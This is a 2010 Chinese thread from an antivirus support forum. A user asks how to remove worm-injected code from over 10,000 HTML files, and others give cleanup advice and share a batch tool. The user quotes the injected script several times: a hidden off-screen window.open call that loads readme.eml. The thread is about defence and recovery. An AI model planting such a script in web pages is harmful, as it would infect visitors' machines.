怎么清楚eml病毒？？？ bbs.ikaka.com

akax - 2010-4-6 11:42:00

我的电脑上中了eml病毒。用瑞星杀毒以后把我所有的HTML网页一块儿删掉。又用瑞星病毒隔壁区，所有文件恢复到原来的位置。我看病毒在Html网页上加上了以下代码：

<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>

不只知道怎么清除10000多个网页中的这些代码？？？？？？

谁能帮我做一个清除这些代码？

用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

附件: 病毒.rar

附件: readme.rar

jks_风 - 2010-4-6 11:59:00

恩，LZ你和我中的一样的病毒，重做系统后千万不要运行任何程序，使用资源管理器打开你的其他盘符，找到exe文件上传到杀毒网看看是不是被感染，如果被感染的话，只能把你的exe文件全部删掉了。

还有你在我的电脑搜索readme.eml然后全部删除，还有就是html的格式的也全部删除。

这个病毒好像是ChinaHack2的变种，还有就是不要贸然的插上U盘等移动设备，不然的话你的资料也可能会毁灭性的损失。

具体的不懂得还是论坛M我吧，我刚冲上次中招的阴影中摆脱出来。我尽量的挽救你吧:kaka6:

jks_风 - 2010-4-6 12:01:00

这个不是病毒，你把你的readme.eml发上来吧。

那个才是样本，我的前些天被杀软啥掉了，样本没有存活下来

akax - 2010-4-6 12:04:00

我已经重做系统了。所有被感染的Exe文件铲除掉了。我的意思就是留下Html文件。Html文件千万不能清除的。我只需要用一个工具来把Html中的病毒代码清除掉。。哥们帮忙啊！！！！！！！

jks_风 - 2010-4-6 12:09:00

我还真的没有这样的工具，我是用的在线收藏。

你是程序员还是怎么，html这么重要吗，那个不行的话，量不是很大的话就手动清除吧。要是没有eml的话，病毒是没法执行的:kaka1:

akax - 2010-4-6 12:17:00

readme.eml的样本给上传到附件里了。你看看。上次杀毒前压缩下来的。

我现在只需要把10000多个网页Html中的那些垃圾代码清除掉。这个需要一个程序员编辑一个小工具就行了。嗨。。。倒霉哦。

akax - 2010-4-6 12:21:00

局域网上用什么来阻止这些eml的传播啊。。我安装的是瑞星2010版。没有阻止上。卡卡也是安装的。局域网的另外垃圾机子有这样的垃圾病毒。

jks_风 - 2010-4-6 12:22:00

引用:

原帖由 akax 于 2010-4-6 12:17:00 发表
readme.eml的样本给上传到附件里了。你看看。上次杀毒前压缩下来的。

我现在只需要把10000多个网页Html中的那些垃圾代码清除掉。这个需要一个程序员编辑一个小工具就行了。嗨。。。倒霉哦。

恩，我待会上传到瑞星官方，（但是这个瑞星已经可以查杀了吧）
额，应该有这样的小程序吧，我现在还没能力写哦:kaka12:

看来你的反病毒知识还是懂得很多哦，能手动的清除掉。去问问谷歌吧，可能会有哦:kaka12:

akax - 2010-4-6 12:26:00

瑞星能杀到。可是不要删掉我的网页哦。其他Exe.文件删掉也是可以的。

我是新疆用户，暂时不能访问谷歌进行搜索。我只能靠瑞星官方啊。

超级游戏迷 - 2010-4-6 13:01:00

谁有iframkill这款网页代码批处理小工具的版友，请不吝上传下，我的找不到了……:default11:

networkedition - 2010-4-6 13:04:00

百度和google都有的:kaka12:

辛达星郁 - 2010-4-6 13:06:00

引用:

原帖由 超级游戏迷 于 2010-4-6 13:01:00 发表
谁有iframkill这款网页代码批处理小工具的版友，请不吝上传下，我的找不到了……:default11:

网上找了一个

附件: iframkill.rar

超级游戏迷 - 2010-4-6 13:06:00

新疆网友不能上百度和谷歌，汗……

辛达星郁 - 2010-4-6 13:07:00

游戏迷新疆那里网络被整治呢！！

貌似网络限制下载东西吧？

networkedition - 2010-4-6 13:21:00

瑞星可以查杀此毒，使用瑞星进行全盘杀毒即可:kaka12:

akax - 2010-4-6 13:49:00

朋友们帮我找一下网页代码批处理工具。

akax - 2010-4-6 14:00:00

谢谢了。我哪去试一试。

瑞星卡卡安全论坛